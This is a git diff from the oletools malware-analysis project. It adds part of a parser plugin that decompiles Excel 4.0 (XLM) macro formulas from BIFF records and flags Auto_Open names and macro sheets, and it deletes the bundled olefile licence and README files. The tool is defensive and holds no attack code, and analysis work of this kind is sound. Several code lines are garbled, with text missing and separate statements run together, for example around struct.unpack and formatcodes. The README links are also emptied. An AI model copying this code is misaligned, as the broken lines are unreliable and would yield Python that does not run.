+0x81D7: 'ON.SHEET',
+0x81D8: 'STANDARD.WIDTH',
+0x81D9: 'SCENARIO.MERGE',
+0x81DA: 'SUMMARY.INFO',
+0x81DB: 'FIND.FILE',
+0x81DC: 'ACTIVE.CELL.FONT',
+0x81DD: 'ENABLE.TIPWIZARD',
+0x81DE: 'VBA.MAKE.ADDIN',
+0x81E0: 'INSERTDATATABLE',
+0x81E1: 'WORKGROUP.OPTIONS',
+0x81E2: 'MAIL.SEND.MAILER',
+0x81E5: 'AUTOCORRECT',
+0x81E9: 'POST.DOCUMENT',
+0x81EB: 'PICKLIST',
+0x81ED: 'VIEW.SHOW',
+0x81EE: 'VIEW.DEFINE',
+0x81EF: 'VIEW.DELETE',
+0x81FD: 'SHEET.BACKGROUND',
+0x81FE: 'INSERT.MAP.OBJECT',
+0x81FF: 'OPTIONS.MENONO',
+0x8205: 'MSOCHECKS',
+0x8206: 'NORMAL',
+0x8207: 'LAYOUT',
+0x8208: 'RM.PRINT.AREA',
+0x8209: 'CLEAR.PRINT.AREA',
+0x820A: 'ADD.PRINT.AREA',
+0x820B: 'MOVE.BRK',
+0x8221: 'HIDECURR.NOTE',
+0x8222: 'HIDEALL.NOTES',
+0x8223: 'DELETE.NOTE',
+0x8224: 'TRAVERSE.NOTES',
+0x8225: 'ACTIVATE.NOTES',
+0x826C: 'PROTECT.REVISIONS',
+0x826D: 'UNPROTECT.REVISIONS',
+0x8287: 'OPTIONS.ME',
+0x828D: 'WEB.PUBLISH',
+0x829B: 'NEWWEBQUERY',
+0x82A1: 'PIVOT.TABLE.CHART',
+0x82F1: 'OPTIONS.SAVE',
+0x82F3: 'OPTIONS.SPELL',
+0x8328: 'HIDEALL.INKANNOTS',
+ }
+
+ def GetFunctionName(functionid):
+ if functionid in dFunctions:
+ name = dFunctions[functionid]
+ if isinstance(name, list):
+ return name[0]
+ else:
+ name = '*UNKNOWN FUNCTION*'
+ return name
+
+ def GetFunctionArity(functionid):
+ arity = 1
+ if functionid in dFunctions:
+ entry = dFunctions[functionid]
+ if isinstance(entry, list):
+ arity = entry[1]
+ return arity
+
+ result = ''
+ stack = []
+ while len(expression) > 0:
+ ptgid = P23Ord(expression[0])
+ expression = expression[1:]
+ if ptgid in dTokens:
+ result += dTokens[ptgid] + ' '
+ if ptgid == 0x03: # ptgAdd https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/27db2f45-11e8-4238-94ed-92fd9c5721fb
+ StackBinary(stack, '+')
+ elif ptgid == 0x4: # ptgSub
+ StackBinary(stack, '-')
+ elif ptgid == 0x5: # ptgMul
+ StackBinary(stack, '*')
+ elif ptgid == 0x6: # ptgDiv
+ StackBinary(stack, '/')
+ elif ptgid == 0x8: # ptgConcat
+ StackBinary(stack, '&')
+ elif ptgid == 0x09: # ptgLt https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/28de4981-1352-4a5e-a3b7-f15a8a6ce7fb
+ StackBinary(stack, '<')
+ elif ptgid == 0x0A: # ptgLE
+ StackBinary(stack, '<=')
+ elif ptgid == 0x0B: # ptgEQ
+ StackBinary(stack, '=')
+ elif ptgid == 0x0C: # ptgGE
+ StackBinary(stack, '>=')
+ elif ptgid == 0x0D: # ptgGT
+ StackBinary(stack, '>')
+ elif ptgid == 0x0E: # ptgNE
+ StackBinary(stack, '<>')
+ elif ptgid == 0x15: # ptgParen
+ operand1 = stack.pop()
+ stack.append('(' + operand1 + ')')
+ elif ptgid == 0x17: # ptgStr https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/87c2a057-705c-4473-a168-6d5fac4a9eba
+ length = P23Ord(expression[0])
+ expression = expression[1:]
+ if P23Ord(expression[0]) == 0: # probably BIFF8 -> UNICODE (compressed)
+ expression = expression[1:]
+ stringValue = P23Decode(expression[:length])
+ result += '"%s" ' % stringValue
+ expression = expression[length:]
+ elif P23Ord(expression[0]) == 1: # if 1, then double byte chars
+ # doublebyte check: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/05162858-0ca9-44cb-bb07-a720928f63f8
+ expression = expression[1:]
+ stringValue = P23Decode(expression[:length*2])
+ result += '"%s" ' % stringValue
+ expression = expression[length*2:]
+ stack.append('"' + stringValue + '"')
+ elif ptgid == 0x19:
+ grbit = P23Ord(expression[0])
+ expression = expression[1:]
+ if grbit & 0x04:
+ result += 'CHOOSE '
+ break
+ else:
+ expression = expression[2:]
+ elif ptgid == 0x16: #ptgMissArg
+ stack.append('')
+ elif ptgid == 0x1d: # ptgBool https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/d59e28db-4d6f-4c86-bcc9-c8a783e352ec
+ boolValue = IFF(P23Ord(expression[0]), 'TRUE', 'FALSE')
+ result += '%s ' % (boolValue)
+ expression = expression[1:]
+ stack.append(boolValue)
+ elif ptgid == 0x1e: #ptgInt
+ value = P23Ord(expression[0]) + P23Ord(expression[1]) * 0x100
+ result += '%d ' % (value)
+ expression = expression[2:]
+ stack.append(str(value))
+ elif ptgid == 0x41: #ptgFuncV
+ functionid = P23Ord(expression[0]) + P23Ord(expression[1]) * 0x100
+ result += '%s (0x%04x) ' % (GetFunctionName(functionid), functionid)
+ expression = expression[2:]
+ StackFunction(stack, GetFunctionName(functionid), GetFunctionArity(functionid))
+ elif ptgid == 0x22 or ptgid == 0x42 or ptgid == 0x62:
+ functionid = P23Ord(expression[1]) + P23Ord(expression[2]) * 0x100
+ numberOfArguments = P23Ord(expression[0])
+ result += 'args %d func %s (0x%04x) ' % (numberOfArguments, GetFunctionName(functionid), functionid)
+ expression = expression[3:]
+ if functionid == 0x806D:
+ expression = expression[9:]
+ StackFunction(stack, GetFunctionName(functionid), numberOfArguments)
+ elif ptgid == 0x23: # ptgName https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/5f05c166-dfe3-4bbf-85aa-31c09c0258c0
+ nameValue = struct.unpack('> 2) / divider
+ else:
+ return struct.unpack('= 21:
+ cellref, dummy = ParseLoc(data, options.cellrefformat, True)
+ formatcodes = 'H'
+ formatsize = struct.calcsize(formatcodes)
+ length = struct.unpack(formatcodes, data[20:20 + formatsize])[0]
+ expression = data[22:]
+ parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
+ line += ' - %s len=%d %s' % (cellref, length, parsedExpression)
+ if len(stack) == 1:
+ csvrow = [currentSheetname, cellref, stack[0], '']
+ else:
+ csvrow = [currentSheetname, cellref, repr(stack), '']
+ if options.formulabytes:
+ data_hex = P23Decode(binascii.b2a_hex(data))
+ spaced_data_hex = ' '.join(a+b for a,b in zip(data_hex[::2], data_hex[1::2]))
+ line += '\nFORMULA BYTES: %s' % spaced_data_hex
+
+ # LABEL record #a# difference BIFF4 and BIFF5+
+ if opcode == 0x18 and len(data) >= 16:
+ flags = P23Ord(data[0])
+ lnName = P23Ord(data[3])
+ szFormula = P23Ord(data[4]) + P23Ord(data[5]) * 0x100
+ offset = 14
+ if P23Ord(data[offset]) == 0: #a# hack with BIFF8 Unicode
+ offset = 15
+ if flags & 0x20:
+ dBuildInNames = {1: 'Auto_Open', 2: 'Auto_Close'}
+ code = P23Ord(data[offset])
+ name = dBuildInNames.get(code, '?')
+ line += ' - built-in-name %d %s' % (code, name)
+ else:
+ name = P23Decode(data[offset:offset+lnName])
+ line += ' - %s' % (name)
+ definesNames.append(name)
+ if flags & 0x01:
+ line += ' hidden'
+ parsedExpression, stack = ParseExpression(data[offset+lnName:offset+lnName+szFormula], definesNames, sheetNames, options.cellrefformat)
+ line += ' len=%d %s' % (szFormula, parsedExpression)
+
+ # FILEPASS record
+ if opcode == 0x2f:
+ filepassFound = True
+
+ # BOUNDSHEET record
+ if opcode == 0x85 and len(data) >= 6:
+ formatcodes = '= 4:
+ formatcodes = 'H'
+ formatsize = struct.calcsize(formatcodes)
+ dt = struct.unpack(formatcodes, data[2:2 + formatsize])[0]
+ dStreamType = {5: 'workbook', 0x10: 'dialog sheet/worksheet', 0x20: 'chart sheet', 0x40: 'macro sheet'}
+ line += ' - %s' % (dStreamType.get(dt, '0x%04x' % dt))
+ if positionBIFFRecord in dSheetNames:
+ line += ' - %s' % (dSheetNames[positionBIFFRecord])
+ currentSheetname = dSheetNames[positionBIFFRecord]
+
+ # STRING record
+ if opcode == 0x207 and len(data) >= 4:
+ values = list(Strings(data[3:]).values())
+ strings = ''
+ if values[0] != []:
+ strings = values[0][0].encode()
+ if values[1] != []:
+ if strings != '':
+ strings += ' '
+ strings += ' '.join(values[1])
+ line += ' - %s' % strings
+
+ # number record
+ if opcode == 0x0203:
+ cellref, data2 = ParseLoc(data, options.cellrefformat, True)
+ formatcodes = ' 0:
+ result.append(' ' + dEncodings[encoding] + ':')
+ result.extend(' ' + foundstring for foundstring in strings)
+ elif options.hex:
+ result.append(binascii.b2a_hex(data))
+ elif options.dump:
+ result = data
+
+ if options.xlm and filepassFound:
+ result = ['FILEPASS record: file is password protected']
+ elif options.xlm and not macros4Found:
+ result = []
+ elif options.csv:
+ result = [MakeCSVLine(row, DEFAULT_SEPARATOR, QUOTE) for row in [['Sheet', 'Reference', 'Formula', 'Value']] + result]
+ elif options.json:
+ result = json.dumps(result)
+
+ return result
+
+AddPlugin(cBIFF)
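The parser added above rebuilds human-readable formulas from BIFF ptg token streams using a classic RPN stack: operand tokens (ptgInt, ptgStr, ptgBool) push strings, binary-operator tokens pop two operands via `StackBinary`, and function tokens pop as many arguments as their arity via `StackFunction`. A minimal standalone sketch of that mechanism (simplified tuple tokens rather than the real BIFF8 byte encoding, and hypothetical helper names):

```python
def stack_binary(stack, operator):
    # Pop two operands and push the combined infix expression.
    right = stack.pop()
    left = stack.pop()
    stack.append('%s%s%s' % (left, operator, right))

def stack_function(stack, name, arity):
    # Pop `arity` arguments (pushed left-to-right) and push a call expression.
    arguments = [stack.pop() for _ in range(arity)]
    arguments.reverse()
    stack.append('%s(%s)' % (name, ','.join(arguments)))

def decompile(tokens):
    # tokens: list of ('int', n), ('op', '+'), or ('func', name, arity) tuples
    stack = []
    for token in tokens:
        if token[0] == 'int':
            stack.append(str(token[1]))
        elif token[0] == 'op':
            stack_binary(stack, token[1])
        elif token[0] == 'func':
            stack_function(stack, token[1], token[2])
    return stack[0]

# RPN token order for SUM(1+2, 3): operands first, operators/functions after
print(decompile([('int', 1), ('int', 2), ('op', '+'),
                 ('int', 3), ('func', 'SUM', 2)]))  # -> SUM(1+2,3)
```

This is also why the real code reports `repr(stack)` when more than one element remains after parsing: a well-formed expression reduces the stack to exactly one string.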
diff --git a/oletools/thirdparty/olefile/CONTRIBUTORS.txt b/oletools/thirdparty/olefile/CONTRIBUTORS.txt
deleted file mode 100644
index 32db267c..00000000
--- a/oletools/thirdparty/olefile/CONTRIBUTORS.txt
+++ /dev/null
@@ -1,17 +0,0 @@
-CONTRIBUTORS for the olefile project
-====================================
-
-This is a non-exhaustive list of all the people who helped me improve the
-olefile project (formerly OleFileIO_PL), in approximative chronological order.
-Please contact me if I forgot to mention your name.
-
-A big thank you to all of them:
-
-- Niko Ehrenfeuchter: added support for Jython
-- Niko Ehrenfeuchter, Martijn Berger and Dave Jones: helped fix 4K sector support
-- Martin Panter: conversion to Python 3.x/2.6+
-- mete0r_kr: added support for file-like objects
-- chuckleberryfinn: fixed bug in getproperties
-- Martijn, Ben G.: bug report for 64 bits platforms
-- Philippe Lagadec: main author and maintainer since 2005
-- and of course Fredrik Lundh: original author of OleFileIO from 1995 to 2005
diff --git a/oletools/thirdparty/olefile/LICENSE.txt b/oletools/thirdparty/olefile/LICENSE.txt
deleted file mode 100644
index 506a3d78..00000000
--- a/oletools/thirdparty/olefile/LICENSE.txt
+++ /dev/null
@@ -1,56 +0,0 @@
-LICENSE for the olefile package:
-
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2016 Philippe Lagadec
-(http://www.decalage.info)
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- * Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-----------
-
-olefile is based on source code from the OleFileIO module of the Python
-Imaging Library (PIL) published by Fredrik Lundh under the following license:
-
-The Python Imaging Library (PIL) is
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated
-documentation, you agree that you have read, understood, and will comply with
-the following terms and conditions:
-
-Permission to use, copy, modify, and distribute this software and its
-associated documentation for any purpose and without fee is hereby granted,
-provided that the above copyright notice appears in all copies, and that both
-that copyright notice and this permission notice appear in supporting
-documentation, and that the name of Secret Labs AB or the author not be used
-in advertising or publicity pertaining to distribution of the software without
-specific, written prior permission.
-
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
-SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN
-NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL,
-INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
-LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
-OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
-PERFORMANCE OF THIS SOFTWARE.
diff --git a/oletools/thirdparty/olefile/README.html b/oletools/thirdparty/olefile/README.html
deleted file mode 100644
index 74d95acc..00000000
--- a/oletools/thirdparty/olefile/README.html
+++ /dev/null
@@ -1,81 +0,0 @@
-olefile (formerly OleFileIO_PL)
-olefile is a Python package to parse, read and write Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office 97-2003 documents, vbaProject.bin in MS Office 2007+ files, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
-News
-Follow all updates and news on Twitter: https://twitter.com/decalage2
-
-- 2016-02-02 v0.43: fixed issues #26 and #27, better handling of malformed files, use python logging.
-- 2015-01-25 v0.42: improved handling of special characters in stream/storage names on Python 2.x (using UTF-8 instead of Latin-1), fixed bug in listdir with empty storages.
-- 2014-11-25 v0.41: OleFileIO.open and isOleFile now support OLE files stored in byte strings, fixed installer for python 3, added support for Jython (Niko Ehrenfeuchter)
-- 2014-10-01 v0.40: renamed OleFileIO_PL to olefile, added initial write support for streams >4K, updated doc and license, improved the setup script.
-- 2014-07-27 v0.31: fixed support for large files with 4K sectors, thanks to Niko Ehrenfeuchter, Martijn Berger and Dave Jones. Added test scripts from Pillow (by hugovk). Fixed setup for Python 3 (Martin Panter)
-- 2014-02-04 v0.30: now compatible with Python 3.x, thanks to Martin Panter who did most of the hard work.
-- 2013-07-24 v0.26: added methods to parse stream/storage timestamps, improved listdir to include storages, fixed parsing of direntry timestamps
-- 2013-05-27 v0.25: improved metadata extraction, properties parsing and exception handling, fixed issue #12
-- 2013-05-07 v0.24: new features to extract metadata (get_metadata method and OleMetadata class), improved getproperties to convert timestamps to Python datetime
-- 2012-10-09: published python-oletools, a package of analysis tools based on OleFileIO_PL
-- 2012-09-11 v0.23: added support for file-like objects, fixed issue #8
-- 2012-02-17 v0.22: fixed issues #7 (bug in getproperties) and #2 (added close method)
-- 2011-10-20: code hosted on bitbucket to ease contributions and bug tracking
-- 2010-01-24 v0.21: fixed support for big-endian CPUs, such as PowerPC Macs.
-- 2009-12-11 v0.20: small bugfix in OleFileIO.open when filename is not plain str.
-- 2009-12-10 v0.19: fixed support for 64 bits platforms (thanks to Ben G. and Martijn for reporting the bug)
-- see changelog in source code for more info.
-
-Download/Install
-If you have pip or setuptools installed (pip is included in Python 2.7.9+), you may simply run pip install olefile or easy_install olefile for the first installation.
-To update olefile, run pip install -U olefile.
-Otherwise, see https://bitbucket.org/decalage/olefileio_pl/wiki/Install
-Features
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003 legacy document formats (Word .doc, Excel .xls, PowerPoint .ppt, Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook messages, StickyNotes, Zeiss AxioVision ZVI files, Olympus FluoView OIB files, etc
-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent package or with PIL/Pillow.
-olefile is mostly meant for developers. If you are looking for tools to analyze OLE files or to extract data (especially for security purposes such as malware analysis and forensics), then please also check my python-oletools, which are built upon olefile and provide a higher-level interface.
-History
-olefile is based on the OleFileIO module from PIL, the excellent Python Imaging Library, created and maintained by Fredrik Lundh. The olefile API is still compatible with PIL, but since 2005 I have improved the internal implementation significantly, with new features, bugfixes and a more robust design. From 2005 to 2014 the project was called OleFileIO_PL, and in 2014 I changed its name to olefile to celebrate its 9 years and its new write features.
-As far as I know, olefile is the most complete and robust Python implementation to read MS OLE2 files, portable on several operating systems. (please tell me if you know other similar Python modules)
-Since 2014 olefile/OleFileIO_PL has been integrated into Pillow, the friendly fork of PIL. olefile will continue to be improved as a separate project, and new versions will be merged into Pillow regularly.
-Main improvements over the original version of OleFileIO in PIL:
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-Documentation
-Please see the online documentation for more information, especially the OLE overview and the API page which describe how to use olefile in Python applications. A copy of the same documentation is also provided in the doc subfolder of the olefile package.
-Real-life examples
-A real-life example: using OleFileIO_PL for malware analysis and forensics.
-See also this paper about python tools for forensics, which features olefile.
-License
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2016 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-
-- Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-- Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-olefile is based on source code from the OleFileIO module of the Python Imaging Library (PIL) published by Fredrik Lundh under the following license:
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated documentation, you agree that you have read, understood, and will comply with the following terms and conditions:
-Permission to use, copy, modify, and distribute this software and its associated documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appears in all copies, and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Secret Labs AB or the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/oletools/thirdparty/olefile/README.rst b/oletools/thirdparty/olefile/README.rst
deleted file mode 100644
index 04d77750..00000000
--- a/oletools/thirdparty/olefile/README.rst
+++ /dev/null
@@ -1,226 +0,0 @@
-olefile (formerly OleFileIO\_PL)
-================================
-
-`olefile `__ is a Python package to
-parse, read and write `Microsoft OLE2
-files `__
-(also called Structured Storage, Compound File Binary Format or Compound
-Document File Format), such as Microsoft Office 97-2003 documents,
-vbaProject.bin in MS Office 2007+ files, Image Composer and FlashPix
-files, Outlook messages, StickyNotes, several Microscopy file formats,
-McAfee antivirus quarantine files, etc.
-
-**Quick links:** `Home page `__ -
-`Download/Install `__
-- `Documentation `__ -
-`Report
-Issues/Suggestions/Questions `__
-- `Contact the author `__ -
-`Repository `__ - `Updates
-on Twitter `__
-
-News
-----
-
-Follow all updates and news on Twitter: https://twitter.com/decalage2
-
-- **2016-02-02 v0.43**: fixed issues
- `#26 `__
- and
- `#27 `__,
- better handling of malformed files, use python logging.
-- 2015-01-25 v0.42: improved handling of special characters in
- stream/storage names on Python 2.x (using UTF-8 instead of Latin-1),
- fixed bug in listdir with empty storages.
-- 2014-11-25 v0.41: OleFileIO.open and isOleFile now support OLE files
- stored in byte strings, fixed installer for python 3, added support
- for Jython (Niko Ehrenfeuchter)
-- 2014-10-01 v0.40: renamed OleFileIO\_PL to olefile, added initial
- write support for streams >4K, updated doc and license, improved the
- setup script.
-- 2014-07-27 v0.31: fixed support for large files with 4K sectors,
- thanks to Niko Ehrenfeuchter, Martijn Berger and Dave Jones. Added
- test scripts from Pillow (by hugovk). Fixed setup for Python 3
- (Martin Panter)
-- 2014-02-04 v0.30: now compatible with Python 3.x, thanks to Martin
- Panter who did most of the hard work.
-- 2013-07-24 v0.26: added methods to parse stream/storage timestamps,
- improved listdir to include storages, fixed parsing of direntry
- timestamps
-- 2013-05-27 v0.25: improved metadata extraction, properties parsing
-  and exception handling, fixed issue #12
-- 2013-05-07 v0.24: new features to extract metadata (get\_metadata
- method and OleMetadata class), improved getproperties to convert
- timestamps to Python datetime
-- 2012-10-09: published python-oletools, a
-  package of analysis tools based on OleFileIO\_PL
-- 2012-09-11 v0.23: added support for file-like objects, fixed issue #8
-- 2012-02-17 v0.22: fixed issues #7 (bug in getproperties) and #2
- (added close method)
-- 2011-10-20: code hosted on bitbucket to ease contributions and bug
- tracking
-- 2010-01-24 v0.21: fixed support for big-endian CPUs, such as PowerPC
- Macs.
-- 2009-12-11 v0.20: small bugfix in OleFileIO.open when filename is not
- plain str.
-- 2009-12-10 v0.19: fixed support for 64 bits platforms (thanks to Ben
- G. and Martijn for reporting the bug)
-- see changelog in source code for more info.
-
-Download/Install
-----------------
-
-If you have pip or setuptools installed (pip is included in Python
-2.7.9+), you may simply run **pip install olefile** or **easy\_install
-olefile** for the first installation.
-
-To update olefile, run **pip install -U olefile**.
-
-Otherwise, see https://bitbucket.org/decalage/olefileio_pl/wiki/Install
-
-Features
---------
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003
- legacy document formats (Word .doc, Excel .xls, PowerPoint .ppt,
- Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook
- messages, StickyNotes, Zeiss AxioVision ZVI files, Olympus FluoView
- OIB files, etc
-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent package or with PIL/Pillow.
-
-olefile is mostly meant for developers. If you are looking for tools to
-analyze OLE files or to extract data (especially for security purposes
-such as malware analysis and forensics), then please also check my
-python-oletools, which
-are built upon olefile and provide a higher-level interface.
-
-History
--------
-
-olefile is based on the OleFileIO module from PIL, the
-excellent Python Imaging Library, created and maintained by Fredrik
-Lundh. The olefile API is still compatible with PIL, but since 2005 I
-have improved the internal implementation significantly, with new
-features, bugfixes and a more robust design. From 2005 to 2014 the
-project was called OleFileIO\_PL, and in 2014 I changed its name to
-olefile to celebrate its 9 years and its new write features.
-
-As far as I know, olefile is the most complete and robust Python
-implementation to read MS OLE2 files, portable on several operating
-systems. (please tell me if you know other similar Python modules)
-
-Since 2014 olefile/OleFileIO\_PL has been integrated into
-Pillow, the friendly fork of PIL.
-olefile will continue to be improved as a separate project, and new
-versions will be merged into Pillow regularly.
-
-Main improvements over the original version of OleFileIO in PIL:
-----------------------------------------------------------------
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise
- exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document
- forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-Documentation
--------------
-
-Please see the online documentation for
-more information, especially the OLE overview
-and the API page, which
-describe how to use olefile in Python applications. A copy of the same
-documentation is also provided in the doc subfolder of the olefile
-package.
-
-Real-life examples
-------------------
-
-A real-life example: using OleFileIO\_PL for malware analysis and
-forensics.
-
-See also this paper
-about python tools for forensics, which features olefile.
-
-License
--------
-
-olefile (formerly OleFileIO\_PL) is copyright (c) 2005-2016 Philippe
-Lagadec (http://www.decalage.info)
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-- Redistributions of source code must retain the above copyright
- notice, this list of conditions and the following disclaimer.
-- Redistributions in binary form must reproduce the above copyright
- notice, this list of conditions and the following disclaimer in the
- documentation and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
-IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
-TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
-PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
-TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
-LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
---------------
-
-olefile is based on source code from the OleFileIO module of the Python
-Imaging Library (PIL) published by Fredrik Lundh under the following
-license:
-
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated
-documentation, you agree that you have read, understood, and will comply
-with the following terms and conditions:
-
-Permission to use, copy, modify, and distribute this software and its
-associated documentation for any purpose and without fee is hereby
-granted, provided that the above copyright notice appears in all copies,
-and that both that copyright notice and this permission notice appear in
-supporting documentation, and that the name of Secret Labs AB or the
-author not be used in advertising or publicity pertaining to
-distribution of the software without specific, written prior permission.
-
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO
-THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR
-ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
-RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF
